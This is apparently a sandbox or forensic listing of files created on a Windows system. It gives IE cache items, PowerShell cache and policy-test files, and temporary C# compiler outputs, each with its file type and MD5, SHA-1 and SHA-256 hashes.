C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\log[1].gif	GIF image data, version 89a, 1 x 1	349909CE1E0BC971D452284590236B09	ADFC01F8A9DE68B9B27E6F98A68737C162167066	796C46EC10BC9105545F6F90D51593921B69956BD9087EB72BEE83F40AD86F90
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\medianet[1].htm	HTML document, ASCII text, with very long lines	6993D214E56D325FE95EED908E99117B	39242254F48F531EC330C9FE7D7849C990F60F85	2FC860C5345300292341E51A99A178ADE7132D6BE27A19FFEBC99CA94109736A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\medianet[2].htm	HTML document, ASCII text, with very long lines	CB9035769E03E987B06381F4D5F87955	159727D6B1FD10F4678C84512F16937C5EFB46F2	01610B01E5DE324EFF1CD9F2377A97082117DF0F3BB679CA4A4BD45D581F84B2
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otBannerSdk[1].js	ASCII text, with very long lines, with CRLF line terminators	9982BA07340077CE7240B75C6C6FCBB4	D776E39E13F151C5ED2F7E5761EDE13D9CC72D27	87C99BCF98F3DA7D1429DAC8184E3212634B65706CE7740CE940D1553B57DAAA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otSDKStub[1].js	ASCII text, with very long lines, with CRLF line terminators	BC43FF0C0937C3918A99FD389A0C7F14	7F114B631F41AE5F62D4C9FBD3F9B8F3B408B982	E508B6A9CA5BBAED7AC1D37C50D796674865F2E2A6ADAFAD1746F19FFE52149E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\85-0f8009-68ddb2ab[1].js	UTF-8 Unicode text, with very long lines, with no line terminators	CDD6C5E31F58A546B6F9637389B2503B	0ADA1E1C82B8E7636F6DAF4CE78D571C80A3E81A	4CC5BC89E9F4E54FE905AB22340FA3793FE04F30453DC17CE2780D61DB35D5D4
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB15AQNm[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 622x368, frames 3	C701BB9A16E05B549DA89DF384ED874D	61F7574575B318BDBE0BADB5942387A65CAB213C	445339480FB2AE6C73FF3A11F9F9F3902588BFB8093D5CC8EF60AF8EF9C43B35
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB17milU[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	DDE867EA1D9D8587449D8FA9CBA6CB71	1A8B95E13686068DD73FDCDD8D9B48C640A310C4	3D5AD319A63BCC4CD963BDDCF0E6A629A40CC45A9FB14DEFBB3F85A17FCC20B2
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1cEP3G[1].png	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced	18851868AB0A4685C26E2D4C2491B580	0B61A83E40981F65E8317F5C4A5C5087634B465F	C7F0A19554EC6EA6E3C9BD09F3C662C78DC1BF501EBB47287DED74D82AFD1F72
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dCSOZ[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	5F25361D8730566E8A8C453E8CC1339D	CD0C5A8D20810511C42D2EB37381EA9213568EDD	7763287F5905D00A46BF4760FCF6C19E5BB0F234776BCAD174754BFBE304CF58
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dH8OJ[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 206x250, frames 3	6B4A50D78C876AA0E985EE05096F8803	3AD0DCB44FBB4CD693C49B969E2AA9C7FFA85D5C	35A290B70BEF0733752F699867D3C690866D7421CBB268285A5784521909326E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHA3W[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 311x333, frames 3	1073767D3A3C229A115D3972CA15FF12	86E9BA8E55BA3C524972A93D31645D5B25B0AC28	0EE8C7507A57750E4BB0B3A15843DA7ADEF04F6A1DD0CA342A6B38F199996677
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHDkQ[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3	AD364F520A0382EF236AE304AA6415CC	792269064259F8A83ACC425DBA137C9F1226CD51	CB1594B89C70600401837A2CE4B8C5DEC43CADDBFF5C96DA674DC56B7A93B2F9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHNjB[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 311x333, frames 3	66E13DEA8349F22AC167937C2611AC21	EC48DA19B0B80412C8DB6A3F26C68D0862BE6363	EDBE0AD4E5B4D8E5E87B3323555528F374E468020595269CCFB2B6782FBDB436
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHgEB[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3	74B167BF2E58CD68DEF244DEC6D743B0	9C5C5937A028D6509D547A6BE903843E89BEFF05	24EF6B7ADC8621B0E7A4B9DA591308E941A1DF49665B5B524774E8288779586D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHhSJ[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 206x250, frames 3	0CC4BBA7173007E90589461E4A7179EF	A943E2298F1F9123D97D9D198FD61F6F62695CB0	516702589A5B41C91F0D6C7C18DB3800B7CB6CF5612E88FC50572411B0FB8B45
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHqD2[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 622x368, frames 3	E38552C3BAD509D4FCB24C4C706E0CD5	2AE245AEF45186459BBDBD95BDD8F403E65D0A17	AA8D1A16D3782F693F2CCE6006646D1E51E61AED1800507BC4570846C5FAE792
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHqH1[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 622x368, frames 3	AD771B594D8435B72EC3C554C8D24559	EF20299A044277D48BA2F7A48DAD911C9203961E	3C22853E71F5E3D4E9720B982F816E98A9CFCA3283DBC850807874B376E6EBDE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHsLz[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3	A19E613EE2A01161681B815588E1A4B1	336D67A56FB76BAEB035AEAB1401A373E4A85C63	358BDE094168889AB6FED6D0E5BFB5782BACD098EFED88A75A6D36D934ED8682
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHvHH[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3	83D2849669D6CED53D3D12F06F5EC8DF	653C48E1F00FE4F687018E252726D862B70FC738	9D299D31BBC1C2CAE83CF102535C81A25773E8C75D8657E25F7AB354DACDBBE7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1kc8s[1].png	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	2C55F358C8213245D8DE540D89B76ED0	413A0EA00DBB2A54C6A3933B8864E1847D795124	D11901D46370D97173C94754B69E90D7540FAF1F5C571C5E521E3A062FBF0A77
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBUE92F[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	770E05618413895818A5CE7582D88CBA	EF83CE65E53166056B644FFC13AF981B64C71617	EEC4AB26140F5AEA299E1D5D5F0181DDC6B4AC2B2B54A7EE9E7BA6E0A4B4667D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBVuddh[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	245557014352A5F957F8BFDA87A3E966	9CD29E2AB07DC1FEF64B6946E1F03BCC0A73FC5C	0A33B02F27EE6CD05147D81EDAD86A3184CCAF1979CB73AD67B2434C2A4A6379
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBkwUr[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	D59ADB8423B8A56097C2AE6CBEDBEC57	CAFB3A8ABA2423C99C218C298C28774857BEBB46	4CC08B49D22AF4993F4B43FD05DE6E1E98451A83B3C09198F58D1BAFD0B1BFC3
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\TspIchn[1].htm	ASCII text, with very long lines, with no line terminators	415DBB7F17A00913790F8E99ADBB9D93	C7D1A1B88A46A1E65B109257BFFFB5259900AF17	3A7B725B6B273BFCFDBEC5A06868562AD848034EFBA247BE5739858768FC3B0A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\a8a064[1].gif	GIF image data, version 89a, 28 x 28	3CC1C4952C8DC47B76BE62DC076CE3EB	65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979	10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\e151e5[1].gif	GIF image data, version 89a, 1 x 1	F8614595FBA50D96389708A4135776E4	D456164972B508172CEE9D1CC06D1EA35CA15C21	7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\fcmain[1].js	HTML document, ASCII text, with very long lines, with no line terminators	49E3474775215A51371E367C126F9019	CF5F7BFA8269CC48FECDFD090F21EAC2DE919F89	B76068D72395ACEA32BA01DA392E2B5F7548DCFEE41BD2399C8C6EE2DC421335
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\fcmain[2].js	HTML document, ASCII text, with very long lines, with no line terminators	5422169F2532AF7A6AB1A7E7A47A845D	A95093FE1000E3CD26ED718B5D9977F930D16460	23DDE90088FF386A38825FB403E99DFE70AC6A40293EC8142F4F0CB9DC937F77
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\nrrV67478[1].js	ASCII text, with very long lines, with no line terminators	C2DC0FFE06279ECC59ACBC92A443FFD4	C271908D08B13E08BFD5106EE9F4E6487A3CDEC4	51A34C46160A51FB0EAB510A83D06AA9F593C8BEB83099D066924EAC4E4160BC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\otFlat[1].json	ASCII text, with very long lines, with CRLF line terminators	AF6480CC2AD894E536028F3FDB3633D7	EA42290413E2E9E0B2647284C4BC03742C9F9048	CA4F7CE0B724E12425B84184E4F5B554F10F642EE7C4BE4D58468D8DED312183
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\otPcCenter[1].json	ASCII text, with very long lines, with CRLF line terminators	145CAF593D1A355E3ECD5450B51B1527	18F98698FC79BA278C4853D0DF2AEE80F61E15A2	0914915E9870A4ED422DB68057A450DF6923A0FA824B1BE11ACA75C99C2DA9C2
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\41-0bee62-68ddb2ab[1].js	ASCII text, with very long lines, with no line terminators	7ADA9104CCDE3FDFB92233C8D389C582	4E5BA29703A7329EC3B63192DE30451272348E0D	F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\520bb037-5f8d-42d6-934b-d6ec4a6832e8[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3	3DA409E401160F2CC26320E7C912B179	7767EB9EDD6F8B31E772E701569C40C63D54CEEA	E4425D703EFB3AFBA1DD2939763F0F7C511A0808D752036BB6ECE46FF4103603
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\58-acd805-185735b[1].css	UTF-8 Unicode text, with very long lines	A0AB539081F4353D0F375D2C81113BF3	8052F4711131B349AC5261304ED9101D1BAD1D0A	2B669B3829A6FF3B059BA82D520E6CBD635A3FBA31CDC7760664C9F2E1A154B0
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAyuliQ[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	D675AB16BA50C28F1D9D637BBEC7ECFF	C5420141C02C83C3B3A3D3CD0418D3BCEABB306A	E11816F8F2BBC3DC8B2BE84323D6B781B654E80318DC8D02C35C8D7D81CB7848
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1dH21O[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3	E6106B7FCDC35BB6B123E458C2F5E262	5C6E4F1A448E4AD7AA6BA86EE3FCAA40D924DF68	D22C89730234F5F2E500994219556C87DA6033977994BB255C917549FD413D39
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1dHIu4[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 310x166, frames 3	BF50C7F75F3B8C39E02826B94D64CE28	557EE06B93C94B1448731649E55E8F60CAB58E0E	1F0A40DBF4F0DED1608CBA000AE7E63634FF75C20A268B33185E93011D09C083
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1dHLiJ[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 311x333, frames 3	66B71600B13AC2B0A75B1F12E129551E	E169621380C8A0D57A5F0668201D361712363D94	E6530D1F9753BBCD5CC2C01500358F387364CE8E01F9FE845D02E54EF482BC4E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1dHOof[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3	193E43F20B1F4DB702EA2B1C159FA5DB	EF6885A0C5F95F0FFC0A592AC4A5BD2CE053AF67	FC53EC8B04812A3560565050442EB0DC53942235FB0D90B261771BD261DFCC9E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1dHh0U[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3	86CA9C5B378DE7D1460F7BD7C76ED529	CEBC33B54AA9D9BCEC7E4E1364708D46E129B512	9CFFE15F59DC43EF99BBD3ADEB733BD29B42E2946273BCE95988085749DD2C10
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1dHjAC[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3	160C45C87FDED80E2115BBE31C2AD274	75DFD40EF2258F9E6F3FE67B4F3954C5C46DF8C4	76C3F7F0E2E36397AD576FF7FF45351D29D0E3742EC2956292D46E3D66567126
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1dHp67[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3	9B15E8AD506891A65DF61D5667B224BC	6BBE5E8E9024A7B9AD18240D310CC92668669638	E11EA54430FDA99B74038FBF32C3C8EFB8C22C7E9B0E2C66C3E3A78A32D77341
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1dHqBO[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3	E74595DB547B62AA24B95D13DC605286	C9A9ADF007CBBCC4AC7B162750A4C39E8020715F	744B92FEF00C39200C79B3EB4B9D412405BBF23679421617C5A7522D0938307C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1dHxb6[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3	54063753614AD808B2AB3E5DC70FD987	EA0C83EF3CA1894C22341E1ACA471042437829D3	5BCD178B06CCB4BDDEA1C9D60924BA6DE622A38E9096DCE602BD40D261A66B7F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1duefr[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 622x368, frames 3	D4C232F55AF9C862FC604DE2051FCF50	8ABA7C2293019BCAA37676DF6C48B43D1AF80F38	E3C8F0012F0E360BBA2041C9D7200F70A37726F911310589C37D994062B46359
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB6Ma4a[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	6D4A6F49A9B752ED252A81E201B7DB38	765E36638581717C254DB61456060B5A3103863A	500064FB54947219AB4D34F963068E2DE52647CF74A03943A63DC5A51847F588
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB7hg4[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	A4F438CAD14E0E2CA9EEC23174BBD16A	41FC65053363E0EEE16DD286C60BEDE6698D96B3	9D9BCADE7A7F486C0C652C0632F9846FCFD3CC64FEF87E5C4412C677C854E389
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB7hjL[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	D02BB2168E72B702ECDD93BF868B4190	9FB22D0AB1AAA390E0AFF5B721013E706D731BF3	D2750B6BEE5D9BA31AFC66126EECB39099EF6C7E619DB72775B3E0E2C8C64A6F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBK9Hzy[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	4F50C6271B3DF24A75AD8E9822453DA3	F8987C61D1C2D2EC12D23439802D47D43FED3BDF	9AE6A4C5EF55043F07D888AB192D82BB95D38FA54BB3D41F701863239E16E21C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBOLLMj[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	25D424F126A464CA028C0C9BA692ADA9	E54F845D1099C8D7B7BA0C5E9B57DFA7163CE95C	E0DF9CDAFF2557C7B555FFAED40B7E553FF6C50DD58FE79C27B3AA69CC56258D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBPfCZL[1].png	GIF image data, version 89a, 50 x 50	59DAB7927838DE6A39856EED1495701B	A80734C857BFF8FF159C1879A041C6EA2329A1FA	544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBaK3KR[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	5928F2F40E8032C27F5D77E3152A8362	22744343D40A5AF7EA9A341E2E98D417B32ABBE9	5AF55E02633880E0C2F49AFAD213D0004D335FF6CB78CAD33FCE4643AF79AD24
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBnYSFZ[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	CA188779452FF7790C6D312829EEE284	076DF7DE6D49A434BBCB5D88B88468255A739F53	D30AB7B54AA074DE5E221FE11531FD7528D9EEEAA870A3551F36CB652821292F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\cfdbd9[1].png	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced	FE5E6684967766FF6A8AC57500502910	3F660AA0433C4DBB33C2C13872AA5A95BC6D377B	3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\de-ch[1].htm	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators	78111BBDF0B73F5622238B5405AE802B	3CF169693B6B11624B3152C24D0E3432D1220747	E96BFA958D00D663FB8625F3EECD2365471BFDD2C60D05F5FF3965684B61EB78
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\de-ch[1].json	UTF-8 Unicode text, with very long lines, with no line terminators	DBACAF93F0795EB6276D58CC311C1E8F	4667F15EAB575E663D1E70C0D14FE2163A84981D	51D30486C1FE33A38A654C31EDB529A36338FBDFA53D9F238DCCB24FF42F75AF
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\https___console.brax-cdn.com_creatives_b9476698-227d-4478-b354-042472d9181c_TB1253-DE-Aseel-woman-ear-from-side1200x800_1000x600_95b70183091facf1b0f2aa5b71bf2410[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3	1E5A0289B8ED6133340F70DBDACE3025	BE0AEA8EF7CD88CFED4DDFA86336DE5F59081DD5	A3D485A5F211A2E172556261CC3181CD059441F998A30DCF1E3A8837C861569B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\https___console.brax-cdn.com_creatives_b9476698-227d-4478-b354-042472d9181c_TB1827-old_Paulina_pinchy_HA_2_1200x800_1000x600_3ee933ceba847780eac9e141358e121d[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3	B624DB0D0F14A214699C77FE952E6526	5EABDF18C3FE359602E8E827637A62CB387A12C8	8BF73C9F3AFAE1CDF7C9DECC19C8DAC7731901A6A4F355DFACAAC25F4CF5A881
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\iab2Data[1].json	UTF-8 Unicode text, with very long lines, with no line terminators	6AAA0F3074990A455B222A4D044E2346	6443AF82ED596527261B0F4367A67DD4D1BA855B	1232E273F047113AB950CC141FC73D50640D2352B2ED16B89A1BAC01A80BEBEC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\otTCF-ie[1].js	UTF-8 Unicode text, with very long lines, with CRLF line terminators	52F29FAC6C1D2B0BAC8FE5D0AA2F7A15	D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED	E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	1F1446CE05A385817C3EF20CBD8B6E6A	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	5629AA2E2ED9FB76D3139103D36B7023	204350589138FDA6E9442A0DE7188F91FB32F98C	2E3D93BF353C4E8A533BE3289D4BF4AEFC4308F52766C82791ED199A318C9E01
C:\Users\user\AppData\Local\Temp\RES78AB.tmp	data	E70D9CCC29DDEDB60D1FB5F8D9FF4585	DEDB97CBD775916E279B478E830FDAFF2E598A50	AC6E33F97B50CDEB9FB3C28EBEE4F562CE3954AE3C398E3E5082E58B3CE21D26
C:\Users\user\AppData\Local\Temp\RES8CA0.tmp	data	40B2B5CA8116C8139F3CFDE466C0C034	094444AB0B1EDCA9E75964DB8E235F646871D2FA	C041D4DFB3BB59FAA1EF8202A72AB939D1E3F184193006881B478DF432D2BF1D
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dti3bsys.pn3.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vykko003.u02.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP	MSVC .res	ACD31906E8B71160E102EF91C498C525	4609312B997BA6335BAF38EE6C59E53452B50165	2EE77D306D542D6C05E2C9A5454E64326C993D1F8570437645BBA1AE2E621223
C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.0.cs	UTF-8 Unicode (with BOM) text	9FD7479AC9BD39EAF111AEDEC976D3AA	43E99395C9BC72CE1A0280EAB7785DF4A28A7315	3ADE2B51AA3CC413287C4D1C4C85E45C43143CC7871AE72387D161B564D998CF
C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	B7051ACAF0421F0FFA1C081D9EFA4B80	37DA0BD98A97D64C4BC7415A3E8B3A82ABB0FE88	7CB3E4522C8E00E68AC26AE16F0252D0202A0E9A30A256A545B11F04681E1C6F
C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	5D7A071FDE3A804B04B4944D513B8D90	DABE7B6B36A1904DEDC6D36AC5C0F7BF6787B648	AB3E2262D9140724AB204DE95837F6EA58DCF80D4F795680B03248CC3062E515
C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP	MSVC .res	08D3E9FE6B02B5AB1B7FED49645FD0E3	711855FFF2AAC1731A9D2F007300B9F33919C94C	26007703E71AF072A7FC5C4A7C1FBBB5BA4B108C2DF5686CECBCF7CCC48DDC81
C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.0.cs	UTF-8 Unicode (with BOM) text	9E60DAE8669F4427D81524FC662E0E11	63CC313ED28BC014023379CBDCFAA5DE102AE47C	153DE2EE6E519F011708A8F64105253F479B82D64D695D2343FAE9213D677133
C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	22B498E50AF5FB90104BE9860E004C95	DC6B8158DB579F3164B0A758AA2A5D4D1BE84A0B	E7A25511D2A051ADAF4D12B87BF2A051BEF79A80F9F6D03132DC856387FAE7BF
C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	232786BB636DCD35517E73A1A879D8AD	C46CC9223EDBAD20AEB64DF2279466F1B04AC7C3	B9910B0E4C208C9591763B3AB5CC57E4714B4A3F78D9BDDFC3C8E0DB70DBACF5
C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\~DF285CDD8A9FD9EA09.TMP	data	D9784B1EC489A53A9B88EB8E618D2F01	5BF820E64F02D828DE55BA09401E28C3F023564E	99A6FB5BD4091420EA0E239C32968DF31CBF9D4EDE9D70D092110E4554F6D815
C:\Users\user\AppData\Local\Temp\~DF9CDA0495EAAA6AA0.TMP	data	4B8FE7534F968605956B74CAF0FE9704	551B09C12BB7D866A908378F6415E439B48BBF40	458BC2C3A1ED86613D63FD225610DBEBFB8FEFF1B921853688DC4DD29A760E7F
C:\Users\user\AppData\Local\Temp\~DFC2D8801B5FD4FCE7.TMP	data	23D25A4E87883F05A93E4024BC4D6C3A	A7E3789628459F177492E716A75B88A1948DC48B	64AAFA0C507A32285C7163E3883262DA6C06CC4CB7C27C4C62052B41E056CCC7
C:\Users\user\AppData\Local\Temp\~DFCD0A6692DB1F6E05.TMP	data	E72A559FF7BA8DF426BDC5FB7BBE9F28	16EF4FF28571CA78C86299D13A8BEB50F6A4AE85	F0DA35BD880F831F4408D5C8F683513A7B2E9E20011149453C1AD227001B5CC4
C:\Users\user\AppData\Local\Temp\~DFD1DF0FD1C3CEAF12.TMP	data	E142FC1EDE027006ED8A6BAB62771758	49D25C9BB9B5C84CB46C91FECDE3EF69D127584A	F111CF5BC35B5B8832FFA30B38779EA09CA8424AD8C66B6EF558A856D7F46389
